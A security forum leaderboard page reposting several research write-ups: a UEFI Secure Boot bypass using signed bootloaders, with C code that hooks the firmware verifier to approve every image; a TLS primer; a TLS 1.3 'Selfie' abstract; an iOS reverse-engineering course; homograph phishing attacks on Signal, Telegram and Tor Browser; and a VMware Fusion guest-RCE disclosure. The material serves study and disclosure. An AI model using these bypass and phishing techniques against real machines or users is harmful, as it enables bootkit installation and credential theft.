
Leaderboard

Popular Content

Showing content with the highest reputation on 04/08/19 in all areas

  1. Wash it with gasoline and dry it with a lighter...
    3 points
  2. The level some people have reached... Reproducing instructions through mov...
    3 points
  3. I searched all last year for a recording of this presentation, but I only found the PDF. Thanks a lot.
    1 point
  4. Exploiting signed bootloaders to circumvent UEFI Secure Boot

ValdikSS — April 1, 2019 at 01:24 PM
UEFI, Information Security. (A Russian version of this article is available.)

Modern PC motherboard firmware has followed the UEFI specification since 2010. In 2013, a new technology called Secure Boot appeared, intended to prevent bootkits from being installed and run. Secure Boot prevents the execution of unsigned or untrusted program code (.efi programs and operating system boot loaders, additional hardware firmware like video card and network adapter OPROMs).

Secure Boot can be disabled on any retail motherboard, but a mandatory requirement for changing its state is the physical presence of the user at the computer: you have to enter the UEFI settings when the computer boots, and only then can you change Secure Boot settings. Most motherboards include only Microsoft keys as trusted, which forces bootable-software vendors to ask Microsoft to sign their bootloaders. This process includes a code audit and a justification of the need to sign the file with a globally trusted key if they want the disk or USB flash drive to work in Secure Boot mode without adding their key to each computer manually. Linux distributions, hypervisors, antivirus boot disks, and computer recovery software authors all have to get their bootloaders signed by Microsoft.

I wanted to make a bootable USB flash drive with various computer recovery software that would boot without disabling Secure Boot. Let's see how this can be achieved.

Signed bootloaders of bootloaders

So, to boot Linux with Secure Boot enabled, you need a signed bootloader. Microsoft refuses to sign software licensed under GPLv3 because of the license's anti-tivoization rule, so GRUB cannot be signed. To address this issue, the Linux Foundation released PreLoader and Matthew Garrett made shim—small bootloaders that verify the signature or hash of a single file and execute it. PreLoader and shim do not use the UEFI db certificate store; instead they contain a database of allowed hashes (PreLoader) or certificates (shim) inside the executable file itself.

Both programs, in addition to automatically executing trusted files, allow you to run any previously untrusted program in Secure Boot mode, but require the physical presence of the user: when such a program is executed for the first time, you need to select the certificate to be added or the file to be hashed in a graphical interface, after which the data is stored in a special NVRAM variable on the motherboard that is not accessible from the loaded operating system. Files become trusted only for these pre-loaders, not for Secure Boot in general, and still cannot be loaded without PreLoader or shim.

[Screenshot: first boot of untrusted software with shim.]

All modern popular Linux distributions use shim, due to its certificate support, which makes it easy to ship updates for the main bootloader without user interaction. In general, shim is used to run GRUB2—the most popular bootloader on Linux.

GRUB2

To prevent signed-bootloader abuse with malicious intent, Red Hat created patches for GRUB2 that block "dangerous" functions when Secure Boot is enabled: insmod/rmmod, appleloader, linux (replaced by linuxefi), multiboot, xnu, memrw, iorw. The chainloader module, which loads arbitrary .efi files, got its own internal .efi (PE) loader that does not use the UEFI LoadImage/StartImage functions, as well as code to validate loaded files via shim, in order to preserve the ability to load files trusted by shim but not trusted in terms of UEFI.
It's not exactly clear why this method is preferable—UEFI allows one to redefine (hook) the UEFI verification functions; this is how PreLoader works, and indeed the very same feature is present in shim, but disabled by default.

Anyway, using the signed GRUB from some Linux distribution does not suit our needs. There are two ways to create a universal bootable flash drive that would not require adding the keys of each executable file to the trusted list:

1. Use a modified GRUB with the internal EFI loader, without digital signature verification or module restrictions;
2. Use a custom (second-stage) pre-loader that hooks the UEFI file verification functions (EFI_SECURITY_ARCH_PROTOCOL.FileAuthenticationState, EFI_SECURITY2_ARCH_PROTOCOL.FileAuthentication).

The second method is preferable because software executed this way can load and start further software; for example, a UEFI shell can then execute any program. The first method does not provide this, allowing only GRUB itself to execute arbitrary files. Let's modify PreLoader by removing all unnecessary features and patching the verification code to allow everything.
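For a sense of what such a hook amounts to, here is a minimal EDK II-style sketch (not PreLoader's actual code): locate the security architecture protocol and swap its verification callback for one that approves every file. PreLoader and shim implement a more careful version of the same idea.

    #include <Uefi.h>
    #include <Protocol/Security.h>
    #include <Library/UefiBootServicesTableLib.h>

    STATIC EFI_SECURITY_FILE_AUTHENTICATION_STATE mOriginalHandler;

    // Replacement verifier: report every image as successfully authenticated.
    STATIC EFI_STATUS EFIAPI
    AllowEverything (
      IN CONST EFI_SECURITY_ARCH_PROTOCOL  *This,
      IN UINT32                            AuthenticationStatus,
      IN CONST EFI_DEVICE_PATH_PROTOCOL    *File
      )
    {
      return EFI_SUCCESS;
    }

    EFI_STATUS
    InstallSecurityOverride (VOID)
    {
      EFI_SECURITY_ARCH_PROTOCOL  *Security;
      EFI_STATUS                  Status;

      // The firmware consults this protocol for every image it is asked to load.
      Status = gBS->LocateProtocol (&gEfiSecurityArchProtocolGuid, NULL,
                                    (VOID **)&Security);
      if (EFI_ERROR (Status)) {
        return Status;
      }
      mOriginalHandler = Security->FileAuthenticationState;
      Security->FileAuthenticationState = AllowEverything;
      return EFI_SUCCESS;
    }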
The disk architecture is as follows:

    BOOTX64.efi (shim)  →  grubx64.efi (FileAuthentication override)  →  grubx64_real.efi (GRUB2)
           ↓↑
    MokManager.efi (key enrolling tool)

This is how Super UEFIinSecureBoot Disk was made. Super UEFIinSecureBoot Disk is a bootable image with the GRUB2 bootloader, designed to be used as a base for recovery USB flash drives. Key feature: the disk is fully functional with UEFI Secure Boot mode activated. It can launch any operating system or .efi file, even with an untrusted, invalid or missing signature. The disk can be used to run various Live Linux distributions, WinPE environments, or network boot, without disabling Secure Boot mode in UEFI settings, which is convenient for performing maintenance of someone else's PC or corporate laptops, for example when the UEFI settings are locked with a password.

The image contains 3 components: the shim pre-loader from Fedora (signed with a Microsoft key which is pre-installed on most motherboards and laptops), a modified Linux Foundation PreLoader (which disables digital signature verification of executed files), and a modified GRUB2 loader. On first boot it's necessary to select the certificate using MokManager (it starts automatically); after that everything works just as with Secure Boot disabled—GRUB loads any unsigned .efi file or Linux kernel, and executed EFI programs can load any other untrusted executables or drivers.

To demonstrate the disk's functions, the image contains Super Grub Disk (a set of scripts to find and boot an OS even if the bootloader is broken), GRUB Live ISO Multiboot (a set of scripts to boot Linux Live distros directly from an ISO file), One File Linux (a kernel and initrd in a single file, for system recovery) and several UEFI utilities. The disk is also compatible with UEFI without Secure Boot, and with older PCs with BIOS.

Signed bootloaders

I was wondering whether it is possible to bypass the first-boot key enrollment through shim. Could there be signed bootloaders that allow you to do more than their authors expected? As it turns out—there are. One of them is used in Kaspersky Rescue Disk 18, an antivirus boot disk. Its GRUB allows you to load modules (the insmod command), and a module in GRUB is just executable code.

The pre-loader on the disk is a custom one. Of course, you can't just use GRUB from the disk to load untrusted code. It is necessary to modify the chainloader module so that GRUB does not use the UEFI LoadImage/StartImage functions, but instead loads the .efi file into memory itself, performs relocation, finds the entry point and jumps to it. Fortunately, almost all the necessary code is present in Red Hat's GRUB Secure Boot repository; the only problem is that the PE header parser is missing—GRUB normally gets the parsed header from shim, in response to a function call via a special protocol. This is easily fixed by porting the appropriate code from shim or PreLoader into GRUB.

This is how Silent UEFIinSecureBoot Disk was made. The final disk architecture looks as follows:

    BOOTX64.efi (Kaspersky Loader)  →  fde_ld.efi + custom chain.mod (Kaspersky GRUB2)
           →  grubx64.efi (FileAuthentication override)  →  grubx64_real.efi (GRUB2)

The end

In this article we proved the existence of insufficiently reliable bootloaders signed with a Microsoft key, which allow booting untrusted code in Secure Boot mode. Using the signed Kaspersky Rescue Disk files, we achieved silent boot of arbitrary untrusted .efi files with Secure Boot enabled, without the need to add a certificate to the UEFI db or the shim MOK list. These files can be used both for good deeds (booting from USB flash drives) and for evil ones (installing bootkits without the computer owner's consent).

I assume the Kaspersky bootloader's signing certificate will not live long and will be added to the global UEFI certificate revocation list, which will be installed on computers running Windows 10 via Windows Update, breaking Kaspersky Rescue Disk 18 and Silent UEFIinSecureBoot Disk. Let's see how soon this happens.

Super UEFIinSecureBoot Disk download: https://github.com/ValdikSS/Super-UEFIinSecureBoot-Disk
Silent UEFIinSecureBoot Disk download (ZeroNet Git Center network): http://127.0.0.1:43110/1KVD7PxZVke1iq4DKb4LNwuiHS4UzEAdAv/ (About ZeroNet)

Sursa: https://habr.com/en/post/446238/
    1 point
  5. TLS Security 1: What Is SSL/TLS

Posted on April 3, 2019 by Agathoklis Prodromou

Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are cryptographic security protocols. They are used to make sure that network communication is secure. Their main goals are to provide data integrity and communication privacy. The SSL protocol was the first protocol designed for this purpose and TLS is its successor. SSL is now considered obsolete and insecure (even its latest version), so modern browsers such as Chrome or Firefox use TLS instead.

SSL and TLS are commonly used by web browsers to protect connections between web applications and web servers. Many other TCP-based protocols use TLS/SSL as well, including email (SMTP/POP3), instant messaging (XMPP), FTP, VoIP, VPN, and others. Typically, when a service uses a secure connection the letter S is appended to the protocol name, for example, HTTPS, SMTPS, FTPS, SIPS. In most cases, SSL/TLS implementations are based on the OpenSSL library.

SSL and TLS are frameworks that use many different cryptographic algorithms, for example, RSA and various Diffie–Hellman algorithms. The parties agree on which algorithms to use during initial communication. The latest TLS version (TLS 1.3) is specified in the IETF (Internet Engineering Task Force) document RFC 8446, and the latest SSL version (SSL 3.0) is specified in the IETF document RFC 6101.

Privacy & Integrity

SSL/TLS protocols allow the connection between two mediums (client-server) to be encrypted. Encryption lets you make sure that no third party is able to read the data or tamper with it. Unencrypted communication can expose sensitive data such as user names, passwords, credit card numbers, and more. If we use an unencrypted connection and a third party intercepts our connection with the server, they can see all information exchanged in plain text. For example, if we access the website administration panel without SSL and an attacker is sniffing local network traffic, the cookie that we use to authenticate on our website is sent in plain text, and anyone who intercepts the connection can see it. The attacker can use this information to log into our website administration panel. From then on, the attacker's options expand dramatically. However, if we access our website using SSL/TLS, the attacker who is sniffing traffic sees only encrypted data, which is useless to them.

Identification

SSL/TLS protocols use public-key cryptography. Besides encryption, this technology is also used to authenticate the communicating parties. This means that one or both parties know exactly who they are communicating with. This is crucial for applications such as online transactions, because we must be sure that we are transferring money to the person or company who are who they claim to be. When a secure connection is established, the server sends its SSL/TLS certificate to the client. The certificate is then checked by the client against a trusted Certificate Authority, validating the server's identity. Such a certificate cannot be falsified, so the client may be sure that they are communicating with the right server.

Perfect Forward Secrecy

Perfect forward secrecy (PFS) is a mechanism that is used to protect the client if the private key of the server is compromised. Thanks to PFS, the attacker is not able to decrypt any previous TLS communications. To ensure perfect forward secrecy, we use new keys for every session. These keys are valid only as long as the session is active.
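To see the negotiation in practice, here is a minimal client sketch against the OpenSSL 1.1+ API (example.com is just a placeholder host); it verifies the server certificate and prints the protocol version and cipher suite the two sides agreed on:

    #include <stdio.h>
    #include <openssl/ssl.h>

    int main(void) {
        /* TLS_client_method() negotiates the highest version both sides support. */
        SSL_CTX *ctx = SSL_CTX_new(TLS_client_method());
        SSL_CTX_set_min_proto_version(ctx, TLS1_2_VERSION); /* refuse SSL/old TLS */
        SSL_CTX_set_default_verify_paths(ctx);              /* system CA store */
        SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL);     /* authenticate server */

        BIO *bio = BIO_new_ssl_connect(ctx);
        SSL *ssl = NULL;
        BIO_get_ssl(bio, &ssl);
        SSL_set_tlsext_host_name(ssl, "example.com");       /* SNI */
        SSL_set1_host(ssl, "example.com");                  /* hostname check */
        BIO_set_conn_hostname(bio, "example.com:443");

        if (BIO_do_connect(bio) <= 0) {                     /* connect + handshake */
            fprintf(stderr, "connection or handshake failed\n");
            return 1;
        }
        /* e.g. "TLSv1.3" and "TLS_AES_256_GCM_SHA384" */
        printf("protocol: %s, cipher suite: %s\n",
               SSL_get_version(ssl), SSL_get_cipher(ssl));

        BIO_free_all(bio);
        SSL_CTX_free(ctx);
        return 0;
    }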
TLS Security 2 — Learn about the history of SSL/TLS and protocol versions: SSL 2.0, SSL 3.0, TLS 1.0, TLS 1.1, and TLS 1.2.
TLS Security 3 — Learn about SSL/TLS terminology and basics, for example, encryption algorithms, cipher suites, message authentication, and more.
TLS Security 4 — Learn about SSL/TLS certificates, certificate authorities, and how to generate certificates.
TLS Security 5 — Learn how a TLS connection is established, including key exchange, TLS handshakes, and more.
TLS Security 6 — Learn about TLS vulnerabilities and attacks such as POODLE, BEAST, CRIME, BREACH, and Heartbleed.

Agathoklis Prodromou, Web Systems Administrator/Developer. Akis has worked in the IT sphere for more than 13 years, developing his skills from a defensive perspective as a System Administrator and Web Developer, but also from an offensive perspective as a penetration tester. He holds various professional certifications related to ethical hacking, digital forensics and incident response.

Sursa: https://www.acunetix.com/blog/articles/tls-security-what-is-tls-ssl-part-1/
    1 point
  6. Selfie: reflections on TLS 1.3 with PSK

Nir Drucker and Shay Gueron
University of Haifa, Israel, and Amazon, Seattle, USA

Abstract. TLS 1.3 allows two parties to establish a shared session key from an out-of-band agreed Pre-Shared Key (PSK). The PSK is used to mutually authenticate the parties, under the assumption that it is not shared with others. This allows the parties to skip the certificate verification steps, saving bandwidth, communication rounds, and latency. We identify a security vulnerability in this TLS 1.3 path, by showing a new reflection attack that we call "Selfie". The Selfie attack breaks the mutual authentication. It leverages the fact that TLS does not mandate explicit authentication of the server and the client in every message. The paper explains the root cause of this TLS 1.3 vulnerability, demonstrates the Selfie attack on the TLS implementation of OpenSSL and proposes appropriate mitigation. The attack is surprising because it breaks some assumptions and uncovers an interesting gap in the existing TLS security proofs. We explain the gap in the model assumptions and subsequently in the security proofs. We also provide an enhanced Multi-Stage Key Exchange (MSKE) model that captures the additional required assumptions of TLS 1.3 in its current state. The resulting security claims in the case of external PSKs are accordingly different.

Sursa: https://eprint.iacr.org/2019/347.pdf
    1 point
  7. Reverse Engineering iOS Applications

Welcome to my course Reverse Engineering iOS Applications. If you're here it means that you share my interest in application security and exploitation on iOS. Or maybe you just clicked the wrong link 😂

All the vulnerabilities that I'll show you here are real; they've been found in production applications by security researchers, including myself, as part of bug bounty programs or just regular research. One of the reasons why you don't often see writeups with these types of vulnerabilities is that most companies prohibit the publication of such content. We've helped these companies by reporting these issues to them, and we've been rewarded with bounties for that, but no one other than the researcher(s) and the company's engineering team gets to learn from those experiences. This is part of the reason I decided to create this course: by creating a fake iOS application that contains all the vulnerabilities I've encountered in my own research or in the very few publications from other researchers. Even though there are already some projects[^1] aimed at teaching you common issues in iOS applications, I felt we needed one that showed the kind of vulnerabilities we've seen in applications downloaded from the App Store.

This course is divided into 5 modules that will take you from zero to reversing production applications on the Apple App Store. Every module is intended to explain a single part of the process in a series of step-by-step instructions that should guide you all the way to success.

This is my first attempt at creating an online course, so bear with me if it's not the best. I love feedback, and even if you absolutely hate it, let me know; but hopefully you'll enjoy this ride and you'll get to learn something new. Yes, I'm a n00b! If you find typos, mistakes or plain wrong concepts, please be kind and tell me so that I can fix them and we all get to learn!

Modules
- Prerequisites
- Introduction
- Module 1 - Environment Setup
- Module 2 - Decrypting iOS Applications
- Module 3 - Static Analysis
- Module 4 - Dynamic Analysis and Hacking
- Module 5 - Binary Patching
- Final Thoughts
- Resources

License

Copyright 2019 Ivan Rodriguez <ios [at] ivrodriguez.com>

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Disclaimer

I created this course on my own and it doesn't reflect the views of my employer; all the comments and opinions are my own.

Disclaimer of Damages

Use of this course or material is, at all times, "at your own risk."
If you are dissatisfied with any aspect of the course, any of these terms and conditions or any other policies, your only remedy is to discontinue the use of the course. In no event shall I, the course, or its suppliers, be liable to any user or third party for any damages whatsoever resulting from the use or inability to use this course or the material upon this site, whether based on warranty, contract, tort, or any other legal theory, and whether or not the website is advised of the possibility of such damages. Use any software and techniques described in this course, at all times, "at your own risk"; I'm not responsible for any losses, damages, or liabilities arising out of or related to this course. In no event will I be liable for any indirect, special, punitive, exemplary, incidental or consequential damages. This limitation will apply regardless of whether or not the other party has been advised of the possibility of such damages.

Privacy

I'm not personally collecting any information. Since this entire course is hosted on Github, that's the privacy policy you want to read.

[^1]: I love the work @prateekg147 did with DIVA and OWASP did with iGoat. They are great tools to start learning the internals of an iOS application and some of the bugs developers have introduced in the past, but I think many of the issues shown there are just theoretical or impractical and can be compared to a "self-hack". It's like looking at the source code of a webpage in a web browser: you get to understand the static code (HTML/JavaScript) of the website, but any modifications you make won't affect other users. I wanted to show vulnerabilities that can harm the company who created the application or its end users.

Sursa: https://github.com/ivRodriguezCA/RE-iOS-Apps
    1 point
  8. What you see is not what you get: when homographs attack

homographs, telegram, signal, security research — 01 April 2019

Introduction

Since the introduction of Unicode in domain names (known as Internationalized Domain Names, or simply IDN) by ICANN over two decades ago, a series of brand new security implications were brought to light, together with the possibility of registering domain names using different alphabets and Unicode characters. When researching the feasibility of phishing and other attacks based on homographs and IDNs, mainly in the context of web application penetration testing, we stumbled upon a few curious cases where they also affected mobile applications. We then decided to investigate the prevalence of this class of vulnerability in mobile instant messengers, especially the security-oriented ones. This blog post offers a brief overview of homograph attacks, highlights their risks, and presents a chain of two practical exploits against Signal, Telegram and Tor Browser that could lead to nearly impossible to detect phishing scenarios, and also to situations where more powerful exploits could be used against an opsec-aware target.

What are homoglyphs and homographs?

It is not uncommon for characters that belong to different alphabets to look alike. These are called homoglyphs, and sometimes, depending on the font, they happen to get rendered in a visually indistinguishable way, making it impossible for a user to tell the difference between them. To the naked eye 'a' and 'а' look the same (a homoglyph), but the former belongs to the Latin script and the latter to Cyrillic. While for the untrained human eye it is hard to distinguish between them, they may be interpreted entirely differently by computers.

Homographs are two strings that seem to be the same but are in fact different. Consider, for instance, that the English word "lighter" is written the same but has a different meaning depending on the context it is used in: it can mean "a device for lighting a fire", as a noun, or the opposite of "heavier", as an adjective. The strings blazeinfosec.com and blаzeinfosec.com are oftentimes rendered as homographs, but yield different results when used as a URL.

Homoglyphs, and by extension homographs, exist across many different scripts. Latin, Greek and Cyrillic, for example, share numerous characters that either look exactly alike (e.g., A and А) or have a very close resemblance (e.g., P and Р). Unicode maintains a document of "confusable" characters that have look-alikes across different scripts.

Font rendering and homoglyphs

Depending on the font, the way it is rendered and also the size of the font on the display, homoglyphs and homographs may be shown either differently or completely indistinguishably from each other, as seen in CVE-2018-4277 and in the example put together by Xudong Zheng in April 2017, which highlighted the insufficient measures browsers applied against IDN homographs until then. The strings https://www.apple.com (Latin) and https://www.аррӏе.com (Cyrillic) displayed in the font Tahoma, size 30, look identical; the same strings displayed in the font Bookman Old Style, size 30, differ slightly. As rendered, Tahoma does not distinguish between the two, providing a user no visual indication of a fraudulent website. Bookman Old Style, on the other hand, at least renders 'l' and 'І' differently, giving a small visual hint about the legitimacy of the URL.
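The distinction is easy to demonstrate in code. In this small C sketch, the Cyrillic look-alike of apple.com is written out as UTF-8 byte escapes, so no font can blur the picture:

    #include <stdio.h>
    #include <string.h>

    /* "apple.com" in ASCII vs. its Cyrillic look-alike "аррӏе.com"
       (U+0430, U+0440, U+0440, U+04CF, U+0435), spelled as UTF-8 escapes. */
    int main(void) {
        const char *latin = "apple.com";
        const char *spoof = "\xd0\xb0\xd1\x80\xd1\x80\xd3\x8f\xd0\xb5.com";

        printf("%s vs %s\n", latin, spoof);            /* may render identically */
        printf("strcmp: %d\n", strcmp(latin, spoof));  /* non-zero: different bytes */
        printf("lengths: %zu vs %zu\n",
               strlen(latin), strlen(spoof));          /* 9 vs 14 bytes */
        return 0;
    }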
Internationalized Domain Names (IDN) and punycode

With the advent of support for Unicode in major operating systems and applications, and the fact that the Internet gained popularity in countries that do not necessarily use the Latin alphabet, in the late 1990s ICANN introduced the first version of IDN. This meant that domain names could be represented in the characters of a native language, instead of being bound to ASCII characters. However, DNS systems do not understand Unicode, and a strategy to adapt to ASCII-only systems was needed. Therefore, Punycode was invented to translate domain names containing Unicode symbols into ASCII, so DNS servers could work normally. For example, https://www.blazeinfosec.com and https://www.blаzeinfosec.com in ASCII will be:

    https://www.blazeinfosec.com
    https://www.xn--blzeinfosec-zij.com

The 'a' in the second URL is actually 'а' in Cyrillic, so a translation into Punycode is required.
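This translation can be reproduced with a small C sketch; GNU libidn2 is assumed here as the IDNA library (any IDNA2008 implementation would do):

    #include <stdio.h>
    #include <stdlib.h>
    #include <idn2.h>   /* GNU libidn2; build with -lidn2 */

    int main(void) {
        char *ace = NULL;
        /* "blаzeinfosec.com" with a Cyrillic 'а' (U+0430), as UTF-8 */
        int rc = idn2_to_ascii_8z("bl" "\xd0\xb0" "zeinfosec.com", &ace, 0);
        if (rc != IDN2_OK) {
            fprintf(stderr, "idn2: %s\n", idn2_strerror(rc));
            return 1;
        }
        printf("%s\n", ace);   /* expected: xn--blzeinfosec-zij.com */
        free(ace);
        return 0;
    }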
Registration of homograph domains

Initially, in Internationalized Domain Names version 1, it was possible to register a combination of ASCII and Unicode in the same domain. This clearly presented a security problem, and it is no longer possible since the adoption of IDN versions 2 and 3, which further locked down the registration of Unicode domain names. Most notably, they instructed gTLDs to prevent the registration of domain names that contain mixed scripts (e.g., Latin and Kanji characters in the same string). Although many top-level domain registrars restrict mixed scripts, history has shown in practice the possibility of registering similar-looking domains in a single script—which is the currently allowed practice of many gTLD registrars. Just as an example, the domains apple.com and paypal.com have Cyrillic homograph counterparts that were registered by security researchers in the past as a proof of concept of homograph issues in web browsers. Logan McDonald wrote ha-finder, a tool that takes the top 1 million websites, checks whether the letters in each are confusable with Latin or decimal characters, performs a WHOIS lookup, and tells you whether the name is available for registration.

Homograph attacks

Although ICANN has been aware of the potential risks of homograph attacks since the introduction of IDN, one of the first real demonstrations of a practical IDN homograph attack is believed to have been made in 2005 by 3ric Johanson of the Shmoo Group. The details of the issue were described in this Bugzilla ticket, and it affected many other browsers at the time. Another implication of Unicode homographs, though not directly related to the issue described in this blog post, was the attack documented against Spotify in their engineering blog, where a researcher discovered how to take over user accounts due to the improper conversion and canonicalization of Unicode-based usernames into their ASCII counterparts. More recently, similar phishing attacks were spotted in the wild against users of the cryptocurrency exchange MyEtherWallet and Github, and in 2018 Apple fixed a bug in Safari (CVE-2018-4277), discovered by Tencent Labs, where the small Latin letter 'ꝱ' (dum) was rendered in the URL bar exactly like the character 'd'.

Browsers have different strategies to handle IDN. Depending on the configuration, some of them will show the Unicode in order to provide a more friendly user experience. They also have different IDN display algorithms—Google Chrome's algorithm can be found here. It performs checks on the gTLD the domain is registered under, and also verifies whether the characters are in a list of Cyrillic confusables. Firefox, including Tor Browser with its default configuration, implements a far less strict algorithm that simply displays Unicode characters in their intended scripts, even if they are Latin confusables. These measures are certainly not enough to protect users, and it is not difficult to pull off a practical example: just click https://www.раураӏ.com to be taken to a website for which the URL bar shows https://www.paypal.com but which is not at all the original PayPal. This presents a clear problem for users of Firefox and, consequently, Tor Browser. Many attempts to change these two browsers' behavior when displaying IDNs have been made in the past, including tickets for Firefox and for Tor Browser—these tickets have been open since early 2017.

Attacking Signal, Telegram and Tor Browser with homographs

The vast majority of prior research on this topic has been centred around browsers and e-mail clients. Therefore, we decided to look into different vectors where homographs could be leveraged, fully or partially, for successful attacks. Oftentimes the threat model of individuals who use privacy-oriented messenger platforms such as Signal and Telegram includes not clicking links sent via SMS or instant messengers, as this has proven to be the initial attack vector in chains of exploits used to compromise mobile targets. As mentioned earlier in this article, depending on the font and the size used to display the text, a link may be rendered on screen in a visually indistinguishable way, making it impossible for a human user to tell apart a legitimate URL from a malicious one.

Attack steps:

1. The adversary acquires a homograph domain name similar to a suitable target domain
2. The adversary hosts malicious content (e.g., phishing or a browser exploit) on the web server serving this URL
3. The adversary sends a link containing the malicious homograph URL to the target
4. The target clicks the link, believing it to be a legitimate URL it trusts, given there is no way to visually tell apart the legitimate and malicious URLs
5. Malicious activity happens

Both Signal Android and Signal Desktop rendered messages with links containing homograph characters as if they were ordinary Latin URLs. Telegram went as far as generating a preview of the fake website, and rendered the link in a way that makes it impossible for a human to tell it is malicious.

Until recently, many browsers were vulnerable to these attacks and displayed homograph links in the URL bar in a Latin-looking fashion, as opposed to the expected Punycode. Firefox, by default, tries to be user friendly and in many cases does not show Punycode, leaving its users vulnerable to such attacks. Tor Browser, as already mentioned, is based on Firefox, and this allows for a full attack chain against users of Signal and Telegram (Signal + Tor Browser, or Telegram + Tor Browser). Given the privacy concerns and threat model of the users of these instant messengers, it is likely many of them use Tor Browser for their browsing, making them vulnerable to a full-chain homograph attack.

The bugs we found in Signal and Telegram have been assigned CVE-2019-9970 and CVE-2019-10044, respectively. The advisories can be found on our Github advisories page. Other popular instant messengers, like Slack, Facebook Messenger and WhatsApp, were not vulnerable to this class of attack during our experiments.
The latest versions of WhatsApp go as far as showing a label on the link to warn users it may be malicious, while other messengers simply render the link un-clickable.

Conclusion

Confusable homographs are a class of attack against Internet users that has been around for nearly two decades now, since the advent of Unicode in domain names. The risks of homographs in computer security have been known and are relatively well understood, yet we keep seeing homograph-related attacks resurfacing every now and then. Even though they have been around for a while, very little attention has been given to this class of attacks, as they are generally seen as not so harmful and usually fall into the category of social engineering—which is not always part of the threat model of many applications, where it is frequently assumed the user should take care of it; but we believe applications can do better. Finally, application security teams should step up their game and be proactive in preventing such attacks (like Google did with Chrome), instead of pointing the blame at registrars, relying on user awareness not to bite the bait, or waiting for ICANN to come up with a magic solution to the problem.

References

[1] https://krebsonsecurity.com/2018/03/look-alike-domains-and-visual-confusion/
[2] https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
[3] https://bugzilla.mozilla.org/show_bug.cgi?id=279099
[4] https://www.phish.ai/2018/03/13/idn-homograph-attack-back-crypto/
[5] https://dev.to/loganmeetsworld/homographs-attack--5a1p
[6] https://www.unicode.org/Public/security/latest/confusables.txt
[7] https://labs.spotify.com/2013/06/18/creative-usernames
[8] https://xlab.tencent.com/en/2018/11/13/cve-2018-4277
[9] https://urlscan.io/result/0c6b86a5-3115-43d8-9389-d6562c6c49fa
[10] https://www.xudongz.com/blog/2017/idn-phishing
[11] https://github.com/loganmeetsworld/homographs-talk/tree/master/ha-finder
[12] https://www.chromium.org/developers/design-documents/idn-in-google-chrome
[13] https://wiki.mozilla.org/IDN_Display_Algorithm
[14] https://www.ietf.org/rfc/rfc3492.txt
[15] https://trac.torproject.org/projects/tor/ticket/21961
[16] https://bugzilla.mozilla.org/show_bug.cgi?id=1332714

Sursa: https://wildfire.blazeinfosec.com/what-you-see-is-not-what-you-get-when-homographs-attack/
    1 point
  9. VMware Fusion 11 - Guest VM RCE - CVE-2019-5514

published 03-31-2019

TL;DR

You can run an arbitrary command on a VMware Fusion guest VM through a website, without any prior knowledge. Basically, VMware Fusion starts up a websocket listening only on localhost. You can fully control all the VMs through this websocket interface (also create/delete snapshots, whatever you want), including launching apps. You need to have VMware Tools installed on the guest for launching apps, but honestly, who doesn't have it installed? So by putting some JavaScript on a website, you can interact with this undocumented API—and yes, it's all unauthenticated.

Original discovery

I saw a tweet a couple of weeks ago from @CodeColorist (CodeColorist (@CodeColorist) on Twitter) talking about this issue—he was the one who discovered it—but I didn't have time to look into it for a while. When I searched for it again, that tweet had been removed. I found the same tweet on his Weibo account (~Chinese Twitter): CodeColorist Weibo. This is the screenshot he posted:

[Screenshot from the original tweet]

What you can see here is that you can execute arbitrary commands on a guest VM through a websocket interface, which is started by the amsrv process. I would like to give him full credit for this; what I did later is just building on top of that information.

AMSRV

I used ProcInfoExample (GitHub - objective-see/ProcInfoExample: example project, utilizing Proc Info library) to monitor what kind of processes start up when running VMware Fusion. When you start VMware, both vmrest (VMware REST API) and amsrv will be started:

    2019-03-05 17:17:22.434 procInfoExample[10831:7776374] process start:
    pid: 10936
    path: /Applications/VMware Fusion.app/Contents/Library/vmrest
    user: 501
    args: (
        "/Applications/VMware Fusion.app/Contents/Library/amsrv",
        "-D",
        "-p",
        8698
    )

    2019-03-05 17:17:22.390 procInfoExample[10831:7776374] process start:
    pid: 10935
    path: /Applications/VMware Fusion.app/Contents/Library/amsrv
    user: 501
    args: (
        "/Applications/VMware Fusion.app/Contents/Library/amsrv",
        "-D",
        "-p",
        8698
    )

They seem to be related, especially because you can reach some undocumented VMware REST API calls through this port. As you can control the Application Menu through the amsrv process, I think this is something like an "Application Menu Service". If we navigate to /Applications/VMware Fusion.app/Contents/Library/VMware Fusion Applications Menu.app/Contents/Resources, we can find a file called app.asar, and at the end of the file there is a node.js implementation related to this websocket that listens on port 8698. It's pretty nice that you have the source code available in this file, so we don't need to do hardcore reverse engineering. The code reveals that the VMware Fusion Applications Menu will indeed start this amsrv process on port 8698, or, if that is busy, it will try the next available port, and so on.
    const startVMRest = async () => {
      log.info('Main#startVMRest');
      if (vmrest != null) {
        log.warn('Main#vmrest is currently running.');
        return;
      }
      const execSync = require('child_process').execSync;
      let port = 8698; // The default port of vmrest is 8697
      let portFound = false;
      while (!portFound) {
        let stdout = execSync('lsof -i :' + port + ' | wc -l');
        if (parseInt(stdout) == 0) {
          portFound = true;
        } else {
          port++;
        }
      }
      // Let's store the chosen port to global
      global['port'] = port;
      const spawn = require('child_process').spawn;
      vmrest = spawn(path.join(__dirname, '../../../../../', 'amsrv'), [
        '-D',
        '-p',
        port
      ]);
    };

We can find the related logs in the VMware Fusion Applications Menu logs:

    2019-02-19 09:03:05:745 Renderer#WebSocketService::connect: (url: ws://localhost:8698/ws )
    2019-02-19 09:03:05:745 Renderer#WebSocketService::connect: Successfully connected (url: ws://localhost:8698/ws )
